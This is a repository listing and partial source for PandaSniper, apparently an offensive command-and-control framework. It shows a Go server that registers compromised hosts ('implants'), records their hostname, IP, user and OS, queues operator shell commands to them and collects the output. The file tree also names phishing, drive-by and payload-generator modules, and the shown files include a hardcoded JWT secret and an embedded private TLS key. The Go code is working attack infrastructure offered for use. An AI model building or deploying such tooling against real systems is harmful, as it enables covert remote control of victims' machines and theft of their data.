├── .gitignore ├── 1.png ├── Agent ├── Agent.go ├── ca.key └── ca.pem ├── Implant ├── .DS_Store └── main.cpp ├── LICENSE ├── Master ├── PandaSniper.sln └── PandaSniper │ ├── AddListener.xaml │ ├── AddListener.xaml.cs │ ├── App.config │ ├── App.xaml │ ├── App.xaml.cs │ ├── DataFormat.cs │ ├── DoubleBufferListView.cs │ ├── Function.cs │ ├── LinuxExecutable.xaml │ ├── LinuxExecutable.xaml.cs │ ├── LinuxExecutableS.xaml │ ├── LinuxExecutableS.xaml.cs │ ├── ListenersListView.cs │ ├── LoginWindow.xaml │ ├── LoginWindow.xaml.cs │ ├── MainPage.xaml │ ├── MainPage.xaml.cs │ ├── MainPayload.xaml │ ├── MainPayload.xaml.cs │ ├── MainSetting.xaml │ ├── MainSetting.xaml.cs │ ├── MainWindow.xaml │ ├── MainWindow.xaml.cs │ ├── Md5.cs │ ├── Packages.xaml │ ├── Packages.xaml.cs │ ├── PandaSniper.csproj │ ├── PandaSniper.csproj.user │ ├── PayloadGeneragor.xaml │ ├── PayloadGeneragor.xaml.cs │ ├── Properties │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ ├── Resources.resx │ ├── Settings.Designer.cs │ └── Settings.settings │ ├── SpearPhish.xaml │ ├── SpearPhish.xaml.cs │ ├── SslTcpClient.cs │ ├── TargetListView.cs │ ├── WebDriveBy.xaml │ ├── WebDriveBy.xaml.cs │ ├── l.ico │ ├── l.png │ └── packages.config └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | /Master/.vs/PandaSniper/v16 2 | /Master/packages 3 | /Master/PandaSniper/bin/Debug 4 | /Master/PandaSniper/bin/Release 5 | /Master/PandaSniper/obj/Debug 6 | /Master/PandaSniper/obj/Release 7 | .DS_Store 8 | -------------------------------------------------------------------------------- /1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/QAX-A-Team/PandaSniper/6e838a68bfcece23772b696ea811fa33096c2366/1.png -------------------------------------------------------------------------------- /Agent/Agent.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | /* 4 | Agent -> Implant 5 | 6 | /status{ // 携带信息 json {"uid":"1234564","data":"{\"ip\":\"127.0.0.2\",\"hostname\":\"centos\",\"user\":\"www\"}"} 7 | 0: /info 界面提交信息 json {"uid":"1234564","data":"{\"ip\":\"127.0.0.2\",\"hostname\":\"centos\",\"user\":\"www\"}"} 8 | 1: /cmd 获取命令 cmd(string) 9 | /cmdResult 提交命令回显 json {"uid":"1234561","data":"{\"status\":2,\"cmd\":\"whoami\",\"result\":\"www\"}"} 10 | -1: 保持心跳连接 11 | } 12 | 13 | */ 14 | import ( 15 | "context" 16 | "crypto/md5" 17 | "crypto/rand" 18 | "crypto/tls" 19 | "encoding/hex" 20 | "encoding/json" 21 | "fmt" 22 | "io/ioutil" 23 | "log" 24 | "net" 25 | "net/http" 26 | "os" 27 | "os/signal" 28 | "strconv" 29 | "strings" 30 | "time" 31 | 32 | "github.com/bitly/go-simplejson" 33 | "github.com/dgrijalva/jwt-go" 34 | "github.com/urfave/cli" 35 | ) 36 | 37 | var ( 38 | ok bool 39 | port string //tcp端口 40 | intPort int //参数接收端口 41 | //PassHash for md5处理后的pass 42 | PassHash string 43 | pass string //参数接收pass 44 | ExecId string //命令id 45 | ExecCmd string 46 | //ImplanTotal 在线受控端 47 | ImplanTotal string 48 | //ImplanInfo 受控端机器信息集合 49 | ImplanInfo = make(map[string]ImplanStruct) 50 | //ListenerMap for http启动/关闭 51 | ListenerMap = make(map[string]ListenerStruct) 52 | server *http.Server 53 | //ExecAll 命令队列 54 | ExecAll = make(map[string]map[string]ExecallStruct) 55 | //ExecOne 单条命令 56 | ExecOne = make(map[string]ExecallStruct) 57 | //ExecMap 命令执行回显存储 58 | ExecMap = make(map[string]string) 59 | ) 60 | 61 | // jwt全局加密key 62 | const ( 63 | SecretKey = "This IS a Lo3g S4cr4^K4$y" 64 | ) 65 | 66 | //ListenerStruct for http启动/关闭 67 | type ListenerStruct struct { 68 | Status bool //是否启动成功 69 | Err string //当errbool为true时将存在数据 70 | Errbool bool //存在错误时 errbool为true,一般为false 71 | } 72 | 73 | //ResStruct 回显结构 74 | type ResStruct struct { 75 | Code int `json:"code"` // 200 ok 500 内部错误 401 认证错误 76 | Result string `json:"result"` //执行结果 77 | Error string `json:"error"` //错误结果 78 | } 79 | 80 | //ImplanStruct 初始化结构体 81 | type ImplanStruct struct { 82 | Hostname string `json:"hostname"` 83 | IP string `json:"ip"` 84 | InnerIP string `json:"inner_ip"` 85 | User string `json:"user"` 86 | Time string 87 | PID string `json:"pid"` 88 | Cpuinfo string `json:"cpuinfo"` 89 | Osinfo string `json:"osinfo"` 90 | Sleeptime string `json:"sleep_time"` 91 | Country string `json:"country"` 92 | } 93 | 94 | //ExecallStruct for all 95 | type ExecallStruct struct { 96 | Cmd string 97 | Time int64 98 | } 99 | 100 | // json 转 struct 101 | func j2sInfo(JSONStr string) ImplanStruct { 102 | var struc ImplanStruct 103 | json.Unmarshal([]byte(JSONStr), &struc) 104 | return struc 105 | } 106 | 107 | //getDateTime for 获取时间戳 108 | func getDateTime() string { 109 | currentTime := time.Now().Unix() 110 | return strconv.FormatInt(currentTime, 10) 111 | 112 | } 113 | 114 | // 2Implant 115 | // http server 116 | func httpServer(httpport string) { 117 | 118 | var ok1 bool 119 | ListenerValue, ok1 := ListenerMap[httpport] 120 | if ok1 { 121 | 122 | ListenerValue.Errbool = true 123 | ListenerValue.Err = "端口已被使用" 124 | ListenerMap[httpport] = ListenerValue 125 | } else { 126 | quit := make(chan os.Signal) 127 | signal.Notify(quit, os.Interrupt) 128 | 129 | mux := http.NewServeMux() 130 | 131 | mux.HandleFunc("/status", start) 132 | mux.HandleFunc("/cmdResult", getResult) 133 | mux.HandleFunc("/cmd", putCmd) 134 | mux.HandleFunc("/info", getInfo) 135 | mux.HandleFunc("/byebye", sayBye) 136 | 137 | server = &http.Server{ 138 | Addr: ":" + httpport, 139 | WriteTimeout: time.Second * 4, 140 | Handler: mux, 141 | } 142 | 143 | go func() { 144 | // 接收退出信号 145 | <-quit 146 | if err := server.Close(); err != nil { 147 | fmt.Println(httpport + "已关闭") 148 | } 149 | }() 150 | 151 | //存储Listener数据 152 | ListenerValue.Status = true 153 | ListenerValue.Errbool = false 154 | ListenerMap[httpport] = ListenerValue 155 | 156 | err := server.ListenAndServe() 157 | if err != nil { 158 | // 正常退出 159 | if err == http.ErrServerClosed { 160 | fmt.Println(httpport + "已正常关闭") 161 | } else { 162 | fmt.Println(httpport+"已关闭:", err) 163 | ListenerValue.Errbool = true 164 | ListenerValue.Err = "开启http服务错误,请检查端口" 165 | ListenerValue.Status = false 166 | ListenerMap[httpport] = ListenerValue 167 | } 168 | } 169 | 170 | } 171 | 172 | } 173 | 174 | //开始 175 | func start(w http.ResponseWriter, r *http.Request) { 176 | 177 | //状态0 需要去存储信息 状态1 告知去取命令进行执行 状态-1保持连接 178 | //info if判断 uid是否是新 新就放到map里 179 | defer r.Body.Close() 180 | // 请求类型是application/json时从r.Body读取数据 181 | b, err := ioutil.ReadAll(r.Body) //获取访问信息 182 | if err != nil { 183 | fmt.Printf("read request.Body failed, err:%v\n", err) 184 | return 185 | } 186 | res, err := simplejson.NewJson([]byte(b)) 187 | if err != nil { 188 | fmt.Printf("解析json错误1, err:%v\n", err) 189 | return 190 | } 191 | firstUID, err := res.Get("uid").String() 192 | if err != nil { 193 | fmt.Printf("获取数据uid错误1, err:%v\n", err) 194 | return 195 | } 196 | 197 | _, ok = ImplanInfo[firstUID] 198 | if ok { 199 | ExecValue, ok := ExecAll[firstUID] 200 | 201 | if ok { //键值为空保持连接 202 | if len(ExecValue) == 0 { //循环出最小值传递 203 | w.Write([]byte(`-1`)) //保持连接 204 | //取出数据对时间戳进行修改进而判断在线implant 205 | InfoValue, _ := ImplanInfo[firstUID] 206 | InfoValue.Time = getDateTime() 207 | ImplanInfo[firstUID] = InfoValue 208 | 209 | } else { 210 | 211 | now, _ := strconv.ParseInt(getDateTime(), 10, 64) 212 | 213 | for execID, value := range ExecValue { 214 | if value.Time < now { 215 | now = value.Time 216 | ExecCmd = value.Cmd 217 | ExecId = execID 218 | } 219 | } 220 | w.Write([]byte(`1`)) //执行命令 221 | 222 | } 223 | } else { 224 | w.Write([]byte(`-1`)) //保持连接 225 | //取出数据对时间戳进行修改进而判断在线implant 226 | InfoValue, _ := ImplanInfo[firstUID] 227 | InfoValue.Time = getDateTime() 228 | ImplanInfo[firstUID] = InfoValue 229 | } 230 | } else { 231 | w.Write([]byte(`0`)) //存储受控端信息 232 | } 233 | 234 | } 235 | 236 | //存储信息 237 | func getInfo(w http.ResponseWriter, r *http.Request) { 238 | //处理post数据 239 | defer r.Body.Close() 240 | // 请求类型是application/json时从r.Body读取数据 241 | b, err := ioutil.ReadAll(r.Body) 242 | if err != nil { 243 | fmt.Printf("read request.Body failed, err:%v\n", err) 244 | return 245 | } 246 | res, err := simplejson.NewJson([]byte(b)) 247 | if err != nil { 248 | fmt.Printf("获取数据错误, err:%v\n", err) 249 | return 250 | } 251 | uid, err := res.Get("uid").String() 252 | if err != nil { 253 | fmt.Printf("获取数据错误, err:%v\n", err) 254 | return 255 | } 256 | jsondata, err := res.Get("data").String() 257 | if err != nil { 258 | fmt.Printf("获取数据错误, err:%v\n", err) 259 | return 260 | } 261 | ip, err := res.Get("ip").String() 262 | if err != nil { 263 | fmt.Printf("获取数据错误, err:%v\n", err) 264 | return 265 | } 266 | innerIP, err := res.Get("inner_ip").String() 267 | if err != nil { 268 | fmt.Printf("获取数据错误, err:%v\n", err) 269 | return 270 | } 271 | var structIP ImplanStruct 272 | structIP = j2sInfo(ip) 273 | var structData ImplanStruct 274 | structData = j2sInfo(jsondata) 275 | structData.Time = getDateTime() 276 | structData.IP = structIP.IP 277 | structData.Country = structIP.Country 278 | structData.InnerIP = innerIP 279 | ImplanInfo[uid] = structData 280 | 281 | } 282 | 283 | //发送命令 284 | func putCmd(w http.ResponseWriter, r *http.Request) { 285 | w.Write([]byte(ExecCmd)) 286 | } 287 | 288 | //获取命令回显 289 | func getResult(w http.ResponseWriter, r *http.Request) { 290 | //处理post数据 291 | defer r.Body.Close() 292 | // 请求类型是application/json时从r.Body读取数据 293 | c, err := ioutil.ReadAll(r.Body) 294 | if err != nil { 295 | fmt.Printf("read request.Body failed, err:%v\n", err) 296 | return 297 | } 298 | res, err := simplejson.NewJson([]byte(c)) 299 | if err != nil { 300 | fmt.Printf("获取数据错误, err:%v\n", err) 301 | return 302 | } 303 | uid, err := res.Get("uid").String() 304 | if err != nil { 305 | fmt.Printf("获取数据错误, err:%v\n", err) 306 | return 307 | } 308 | result, err := res.Get("result").String() 309 | if err != nil { 310 | fmt.Printf("获取数据错误, err:%v\n", err) 311 | return 312 | } 313 | ExecValue, ok := ExecAll[uid] 314 | fmt.Println("######ExecValue#####:", ExecValue) 315 | if ok { 316 | _, ok = ExecValue[ExecId] 317 | if ok { 318 | ExecMap[ExecId] = result 319 | delete(ExecAll[uid], ExecId) 320 | } else { 321 | fmt.Println("无此命令请求") 322 | } 323 | } else { 324 | w.Write([]byte(`"该用户尚未请求"`)) 325 | } 326 | } 327 | 328 | //关闭listener 329 | func sayBye(w http.ResponseWriter, r *http.Request) { 330 | //处理post数据 331 | defer r.Body.Close() 332 | // 请求类型是application/json时从r.Body读取数据 333 | b, err := ioutil.ReadAll(r.Body) 334 | if err != nil { 335 | fmt.Printf("read request.Body failed, err:%v\n", err) 336 | return 337 | } 338 | res, err := simplejson.NewJson([]byte(b)) 339 | if err != nil { 340 | fmt.Printf("获取数据错误, err:%v\n", err) 341 | return 342 | } 343 | hash, err := res.Get("hash").String() 344 | if err != nil { 345 | fmt.Printf("获取数据错误, err:%v\n", err) 346 | return 347 | } 348 | httpport, err := res.Get("port").String() 349 | if err != nil { 350 | fmt.Printf("获取数据错误, err:%v\n", err) 351 | return 352 | } 353 | if hash == PassHash { 354 | 355 | delete(ListenerMap, httpport) 356 | 357 | ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second) 358 | defer cancel() 359 | 360 | server.SetKeepAlivesEnabled(false) 361 | if err := server.Shutdown(ctx); err != nil { 362 | } 363 | 364 | } 365 | } 366 | 367 | //访问来关闭listener 368 | func exitListener(httpport string, hash string) { 369 | exitData := make(map[string]string) 370 | exitData["port"] = httpport 371 | exitData["hash"] = hash 372 | jsonBytes, err := json.Marshal(exitData) 373 | if err != nil { 374 | fmt.Println(err) 375 | } 376 | fmt.Printf("value: %v\n type:%T", string(jsonBytes), string(jsonBytes)) 377 | url := "http://127.0.0.1:" + httpport + "/byebye" 378 | // 表单数据 379 | // json 380 | contentType := "application/json" 381 | data := string(jsonBytes) 382 | resp, err := http.Post(url, contentType, strings.NewReader(data)) 383 | if err != nil { 384 | fmt.Println("post failed, err:\n", err) 385 | return 386 | } 387 | defer resp.Body.Close() 388 | _, err = ioutil.ReadAll(resp.Body) 389 | if err != nil { 390 | fmt.Println("get resp failed,err:\n", err) 391 | return 392 | } 393 | } 394 | 395 | //2master 396 | //listener tcp+tls 代码 397 | func listener() { 398 | crt, err := tls.LoadX509KeyPair("ca.pem", "ca.key") 399 | if err != nil { 400 | fmt.Println(err.Error()) 401 | } 402 | tlsConfig := &tls.Config{} 403 | tlsConfig.Certificates = []tls.Certificate{crt} 404 | tlsConfig.Time = time.Now 405 | tlsConfig.Rand = rand.Reader 406 | l, err := tls.Listen("tcp", ":"+port, tlsConfig) 407 | if err != nil { 408 | fmt.Println(err.Error()) 409 | } 410 | for { 411 | conn, err := l.Accept() 412 | if err != nil { 413 | fmt.Println(err.Error()) 414 | continue 415 | } else { 416 | go HandleClientConnect(conn) 417 | } 418 | } 419 | 420 | } 421 | 422 | //HandleClientConnect 每次接收数据的处理代码 暂时是循环接收发送,组合时修改为单次接收发送 423 | func HandleClientConnect(conn net.Conn) { 424 | defer conn.Close() 425 | fmt.Println("Receive Connect Request From ", conn.RemoteAddr().String()) 426 | buffer := make([]byte, 102400) 427 | for { 428 | len, err := conn.Read(buffer) 429 | if err != nil { 430 | fmt.Println(err.Error()) 431 | break 432 | } 433 | json_str := string(buffer[:len]) 434 | fmt.Printf("Receive Data: %s\n", json_str) 435 | result := dispatch(json_str) + "" 436 | fmt.Println(result) 437 | //发送给客户端 438 | _, err = conn.Write([]byte(result)) 439 | if err != nil { 440 | break 441 | } 442 | } 443 | fmt.Println("Client " + conn.RemoteAddr().String() + " Connection Closed.....") 444 | } 445 | 446 | // 指令处理 447 | func dispatch(json string) string { 448 | res, err := simplejson.NewJson([]byte(json)) 449 | if err != nil { 450 | Errorstr := "Json Error" 451 | ResJSON := ResultJSON(500, Errorstr, "") 452 | return ResJSON 453 | } else { 454 | typestr, err := res.Get("type").String() 455 | if err != nil { 456 | Errorstr := "Get type error" 457 | ResJSON := ResultJSON(500, Errorstr, "") 458 | return ResJSON 459 | } 460 | if typestr == "0" { 461 | username, err := res.Get("data").Get("user").String() 462 | if err != nil { 463 | Errorstr := "Get user error" 464 | ResJSON := ResultJSON(500, Errorstr, "") 465 | return ResJSON 466 | } 467 | hashstr, err := res.Get("data").Get("hash").String() 468 | if err != nil { 469 | Errorstr := "Get hash error" 470 | ResJSON := ResultJSON(500, Errorstr, "") 471 | return ResJSON 472 | } 473 | if hashstr != "" { 474 | ResJSON := Login(username, hashstr) 475 | return ResJSON 476 | } else { 477 | Errorstr := "Login Hash NULL" 478 | ResJSON := ResultJSON(500, Errorstr, "") 479 | return ResJSON 480 | } 481 | } else if typestr == "1" { 482 | tokenstr, err := res.Get("token").String() 483 | if err != nil { 484 | Errorstr := "Get token error" 485 | ResJSON := ResultJSON(500, Errorstr, "") 486 | return ResJSON 487 | } 488 | if Token(tokenstr) == true { 489 | ResJSON := GetImplant() 490 | return ResJSON 491 | } else { 492 | Errorstr := "Token Error" 493 | ResJSON := ResultJSON(401, Errorstr, "") 494 | return ResJSON 495 | } 496 | } else if typestr == "2" { 497 | tokenstr, err := res.Get("token").String() 498 | if err != nil { 499 | Errorstr := "Get token error" 500 | ResJSON := ResultJSON(500, Errorstr, "") 501 | return ResJSON 502 | } 503 | uid, err := res.Get("data").Get("uid").String() 504 | if err != nil { 505 | Errorstr := "Get uid error" 506 | ResJSON := ResultJSON(500, Errorstr, "") 507 | return ResJSON 508 | } 509 | cmd, err := res.Get("data").Get("cmd").String() 510 | if err != nil { 511 | Errorstr := "Get cmd error" 512 | ResJSON := ResultJSON(500, Errorstr, "") 513 | return ResJSON 514 | } 515 | if Token(tokenstr) == true { 516 | res := cmd2im(uid, cmd) 517 | return res 518 | } else { 519 | Errorstr := "Token Error" 520 | ResJSON := ResultJSON(401, Errorstr, "") 521 | return ResJSON 522 | } 523 | } else if typestr == "3" { 524 | tokenstr, err := res.Get("token").String() 525 | if err != nil { 526 | Errorstr := "Get token error" 527 | ResJSON := ResultJSON(500, Errorstr, "") 528 | return ResJSON 529 | } 530 | httpport, err := res.Get("data").Get("port").String() 531 | if err != nil { 532 | Errorstr := "Get port error" 533 | ResJSON := ResultJSON(500, Errorstr, "") 534 | return ResJSON 535 | } 536 | int, err := strconv.Atoi(httpport) 537 | if err != nil { 538 | Errorstr := "Port error" 539 | ResJSON := ResultJSON(500, Errorstr, "") 540 | return ResJSON 541 | } 542 | fmt.Println("Int port:", int) 543 | if int > 1 && int <= 65535 { 544 | if Token(tokenstr) == true { 545 | go httpServer(httpport) 546 | Stime := time.Now() 547 | Utime := time.Since(Stime) 548 | for { 549 | valus, ok := ListenerMap[httpport] 550 | if ok { 551 | valuestruct := valus 552 | if valuestruct.Status && !valuestruct.Errbool { 553 | ResJSON := ResultJSON(200, "", "success") 554 | return ResJSON 555 | } else { 556 | ResJSON := ResultJSON(500, "Start http server error:"+valuestruct.Err, "") 557 | return ResJSON 558 | } 559 | } 560 | time.Sleep(500 * time.Millisecond) 561 | Utime = time.Since(Stime) 562 | if Utime.Seconds() >= 30.00 { 563 | Errorstr := "Time out! Start http server error" 564 | ResJSON := ResultJSON(500, Errorstr, "") 565 | return ResJSON 566 | } 567 | } 568 | } else { 569 | Errorstr := "Token Error" 570 | ResJSON := ResultJSON(401, Errorstr, "") 571 | return ResJSON 572 | } 573 | } else { 574 | Errorstr := "Port not in {1,65535}" 575 | ResJSON := ResultJSON(500, Errorstr, "") 576 | return ResJSON 577 | } 578 | } else if typestr == "4" { 579 | tokenstr, err := res.Get("token").String() 580 | if err != nil { 581 | Errorstr := "Get token error" 582 | ResJSON := ResultJSON(500, Errorstr, "") 583 | return ResJSON 584 | } 585 | httpport, err := res.Get("data").Get("port").String() 586 | if err != nil { 587 | Errorstr := "Get port error" 588 | ResJSON := ResultJSON(500, Errorstr, "") 589 | return ResJSON 590 | } 591 | int, err := strconv.Atoi(httpport) 592 | if err != nil { 593 | Errorstr := "Port error" 594 | ResJSON := ResultJSON(500, Errorstr, "") 595 | return ResJSON 596 | } 597 | fmt.Println("Int port:", int) 598 | if int > 1 && int <= 65535 { 599 | if Token(tokenstr) == true { 600 | valus, ok := ListenerMap[httpport] 601 | if ok { 602 | valuestruct := valus 603 | if valuestruct.Status { 604 | exitListener(httpport, PassHash) 605 | ResJSON := ResultJSON(200, "", "success") 606 | return ResJSON 607 | } else { 608 | ResJSON := ResultJSON(500, "Start http server error:"+valuestruct.Err, "") 609 | return ResJSON 610 | } 611 | } else { 612 | ResJSON := ResultJSON(500, "Listener not exist", "") 613 | return ResJSON 614 | } 615 | } else { 616 | Errorstr := "Token Error" 617 | ResJSON := ResultJSON(401, Errorstr, "") 618 | return ResJSON 619 | } 620 | } else { 621 | Errorstr := "Port not in {1,65535}" 622 | ResJSON := ResultJSON(500, Errorstr, "") 623 | return ResJSON 624 | } 625 | } else if typestr == "5" { 626 | tokenstr, err := res.Get("token").String() 627 | if err != nil { 628 | Errorstr := "Get token error" 629 | ResJSON := ResultJSON(500, Errorstr, "") 630 | return ResJSON 631 | } 632 | uid, err := res.Get("data").Get("uid").String() 633 | if err != nil { 634 | Errorstr := "Get uid error" 635 | ResJSON := ResultJSON(500, Errorstr, "") 636 | return ResJSON 637 | } 638 | cmd, err := res.Get("data").Get("execid").String() 639 | if err != nil { 640 | Errorstr := "Get execid error" 641 | ResJSON := ResultJSON(500, Errorstr, "") 642 | return ResJSON 643 | } 644 | if Token(tokenstr) == true { 645 | res := GetExec(uid, cmd) 646 | return res 647 | } else { 648 | Errorstr := "Token Error" 649 | ResJSON := ResultJSON(401, Errorstr, "") 650 | return ResJSON 651 | } 652 | } else if typestr == "6" { 653 | tokenstr, err := res.Get("token").String() 654 | if err != nil { 655 | Errorstr := "Get token error" 656 | ResJSON := ResultJSON(500, Errorstr, "") 657 | return ResJSON 658 | } 659 | if Token(tokenstr) == true { 660 | ResJSON := GetListener() 661 | return ResJSON 662 | } else { 663 | Errorstr := "Token Error" 664 | ResJSON := ResultJSON(401, Errorstr, "") 665 | return ResJSON 666 | } 667 | } else { 668 | Errorstr := "Type Error,Please check it" 669 | ResJSON := ResultJSON(500, Errorstr, "") 670 | return ResJSON 671 | } 672 | } 673 | } 674 | 675 | // Login 函数 676 | func Login(username string, hash string) string { 677 | if auth(hash) { 678 | token := jwt.New(jwt.SigningMethodHS256) 679 | claims := make(jwt.MapClaims) 680 | claims["user"] = username 681 | claims["exp"] = time.Now().Add(time.Hour * time.Duration(12)).Unix() 682 | claims["iat"] = time.Now().Unix() 683 | token.Claims = claims 684 | 685 | tokenString, err := token.SignedString([]byte(SecretKey)) 686 | if err != nil { 687 | Errorstr := "Error while signing the token" 688 | ResJSON := ResultJSON(500, Errorstr, "") 689 | return ResJSON 690 | } 691 | ResJSON := ResultJSON(200, "", tokenString) 692 | return ResJSON 693 | } else { 694 | Resstr := "Passwd Error" 695 | ResJSON := ResultJSON(401, "", Resstr) 696 | return ResJSON 697 | } 698 | } 699 | 700 | // Token校验,用来判断是否可以调用具体的功能 701 | func Token(token string) bool { 702 | _, err := jwt.Parse(token, func(*jwt.Token) (interface{}, error) { 703 | return []byte(SecretKey), nil 704 | }) 705 | if err != nil { 706 | fmt.Println("parase with claims failed.", err) 707 | return false 708 | } 709 | return true 710 | } 711 | 712 | //auth权限校验 利用密码的hash校验 713 | func auth(pwd string) bool { 714 | if pwd == PassHash { 715 | return true 716 | } 717 | return false 718 | } 719 | 720 | //MD5 生成32位MD5 721 | func MD5(text string) string { 722 | ctx := md5.New() 723 | ctx.Write([]byte(text)) 724 | return hex.EncodeToString(ctx.Sum(nil)) 725 | } 726 | 727 | //cmd2im 处理执行命令json 728 | func cmd2im(uid string, cmd string) string { 729 | _, status := ImplanInfo[uid] 730 | // 对接时候需要考虑implant存活问题,需要在ImplaInfo 里面设置time来判断,心跳时间到对接再来商量 731 | // 判断是否存在对应 uid 的implant,如果存在,需要查询对应的命令执行map是否存在该uid 没有则创建 732 | if !status { 733 | return ResultJSON(500, "No implant!,Please Check", "") 734 | } else { 735 | StructValue := ExecallStruct{} 736 | //添加一个延迟,防止master批量执行,产生一样的execid 737 | time.Sleep(10 * time.Millisecond) 738 | StructValue.Time = time.Now().Unix() 739 | StructValue.Cmd = cmd 740 | execid := MD5(uid + strconv.FormatInt(time.Now().UnixNano(), 10)) 741 | //ExecOne 单条命令 742 | ExecOneMap := make(map[string]ExecallStruct) 743 | //如果ExecAll 里面不存在uid 对应map(第一次执行命令),先赋值空 744 | _, ok := ExecAll[uid] 745 | if !ok { 746 | ExecAll[uid] = ExecOneMap 747 | } 748 | ExecOneMap = ExecAll[uid] 749 | ExecOneMap[execid] = StructValue 750 | ExecAll[uid] = ExecOneMap 751 | fmt.Println(ExecAll) 752 | return ResultJSON(200, "", execid) 753 | } 754 | } 755 | 756 | // GetExec 757 | func GetExec(uid string, execid string) string { 758 | ResultStr, status := ExecMap[execid] 759 | if status { 760 | return ResultJSON(200, "", ResultStr) 761 | } else { 762 | value, ok := ExecAll[uid] 763 | if ok { 764 | _, execstatus := value[execid] 765 | if execstatus { 766 | return ResultJSON(400, "", "Wait for exec") 767 | } else { 768 | return ResultJSON(404, "execid not in ExecAllMap", "") 769 | } 770 | } else { 771 | return ResultJSON(500, "uid error", "") 772 | } 773 | } 774 | } 775 | 776 | //ResultJSON 封装返回数据 777 | func ResultJSON(code int, errstr string, resustr string) string { 778 | ResStru := ResStruct{} 779 | ResStru.Code = code 780 | ResStru.Error = errstr 781 | ResStru.Result = resustr 782 | jsonBytes, err := json.Marshal(ResStru) 783 | if err != nil { 784 | fmt.Println(err) 785 | } 786 | return string(jsonBytes) 787 | } 788 | 789 | //GetImplant 返回所有在线主机 790 | func GetImplant() string { 791 | var m map[string]interface{} 792 | var s []map[string]interface{} 793 | for key, value := range ImplanInfo { 794 | m = make(map[string]interface{}) 795 | InfoStruct := value 796 | m["uid"] = key 797 | m["hostname"] = InfoStruct.Hostname 798 | m["ip"] = InfoStruct.IP 799 | m["innerip"] = InfoStruct.InnerIP 800 | m["user"] = InfoStruct.User 801 | m["time"] = InfoStruct.Time 802 | m["pid"] = InfoStruct.PID 803 | m["cpuinfo"] = InfoStruct.Cpuinfo 804 | m["osinfo"] = InfoStruct.Osinfo 805 | m["sleeptime"] = InfoStruct.Sleeptime 806 | m["country"] = InfoStruct.Country 807 | s = append(s, m) 808 | } 809 | var Res map[string]interface{} 810 | Res = make(map[string]interface{}) 811 | Res["code"] = "200" 812 | Res["result"] = s 813 | Res["error"] = "" 814 | ResJSON, err := json.Marshal(Res) 815 | if err != nil { 816 | Errorstr := "Get Implant error" 817 | ResJSON := ResultJSON(500, Errorstr, "") 818 | return ResJSON 819 | } else { 820 | return string(ResJSON) 821 | } 822 | } 823 | 824 | //GetListener 825 | func GetListener() string { 826 | var m map[string]interface{} 827 | var s []map[string]interface{} 828 | for key, value := range ListenerMap { 829 | m = make(map[string]interface{}) 830 | InfoStruct := value 831 | m["port"] = key 832 | m["status"] = InfoStruct.Status 833 | s = append(s, m) 834 | } 835 | var Res map[string]interface{} 836 | Res = make(map[string]interface{}) 837 | Res["code"] = "200" 838 | Res["result"] = s 839 | Res["error"] = "" 840 | ResJSON, err := json.Marshal(Res) 841 | if err != nil { 842 | Errorstr := "Get Implant error" 843 | ResJSON := ResultJSON(500, Errorstr, "") 844 | return ResJSON 845 | } else { 846 | return string(ResJSON) 847 | } 848 | } 849 | 850 | func main() { 851 | app := cli.NewApp() 852 | app.Name = "Agent" 853 | app.Flags = []cli.Flag{ 854 | &cli.IntFlag{ 855 | Name: "port,p", 856 | Value: 0, 857 | Usage: "listening port", 858 | Destination: &intPort, 859 | }, &cli.StringFlag{ 860 | Name: "pass", 861 | Value: "", 862 | Usage: "password", 863 | Destination: &pass, 864 | }, 865 | } 866 | app.Action = func(c *cli.Context) error { 867 | 868 | if c.Int("port") < 1 || c.Int("port") > 65535 { 869 | return cli.NewExitError("invalid port,please -h", 2) 870 | } else if len(c.String("pass")) == 0 { 871 | return cli.NewExitError("invalid pass,please -h", 2) 872 | } else { 873 | port = strconv.Itoa(intPort) 874 | PassHash = MD5(pass) 875 | fmt.Println("test2-----start") 876 | listener() 877 | } 878 | return nil 879 | } 880 | err := app.Run(os.Args) 881 | if err != nil { 882 | log.Fatal(err) 883 | } 884 | } 885 | 886 | -------------------------------------------------------------------------------- /Agent/ca.key: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIICXgIBAAKBgQDMgky6LDUZPZa1CmfDjnbyodXtkZWd9cG7V2zFoUl/qIGlx2VD 3 | e/UM98cYJTMQltEifwz2s+DqB/jgDs6yu8M+zcvtMcubQMi8xVTd5EFxw4lsjpMS 4 | h6CTLjUEY2uTYqMEN67WfdQf0kehmVzMYaYKKvM9ggXxPNJrVHiMDRKAjQIDAQAB 5 | AoGBAK7x/C766EV6UTT3/MHmWky/MqEy/DmPZTYc2JjLm3NQM/Ab/b1YCc4ZHEDE 6 | ecWELs2CwBU+1XV+cmFBaYKuapsEtgsUOhTcIEyT35iq6Icnio+WetSKnJNBIyTg 7 | LPTZxDkHSLqX4AMGHXZtM/nRM1buOSoiO/ckPTXVjLDvhByFAkEA4rHzjCmBVgju 8 | zhuHrevVGYVJwB/zmxpNhVBkPan56J2ZdVK20XtsimHBg/TcCRbbPGDbxC+RJNWw 9 | zIA+0IcIewJBAObyI8rqjwqaW5V6JfLk2zL86VgTaBsZotYTH8KaxIUP5vSZbBQG 10 | o9Pz+TtRbndSWuvG3E22L5SasdCvi3XdgJcCQQCmhm4P0hVuK9WwlcyPWCQMQTsx 11 | 5MbAcwvrGGjqW0h3Nf4ajw44x9+tr63Fz0MrchzON6B4dzC5zDe5oaOC7w6tAkEA 12 | gQGn7tTh/JlHKZOnGSywKaZPrsyAbgr/BDiAmFOeDXpZmC8PyYv//gkeIv2VCIBv 13 | m59lNt/balaTl7BH5hpKlwJAIzZbZmd4IQRcNarXyJb0UCdKp8Wn+HAa/N1lRA9P 14 | tg5LfJL1PXm/EzjhyVRrlWGufW0ihoqCYx91MjamOLyu7w== 15 | -----END PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /Agent/ca.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB7TCCAVagAwIBAgICBnUwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEChMHVGVz 3 | dCBDbzAeFw0yMDAyMDUwODI2NDFaFw0zMDAyMDUwODI2NDFaMBIxEDAOBgNVBAoT 4 | B1Rlc3QgQ28wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMyCTLosNRk9lrUK 5 | Z8OOdvKh1e2RlZ31wbtXbMWhSX+ogaXHZUN79Qz3xxglMxCW0SJ/DPaz4OoH+OAO 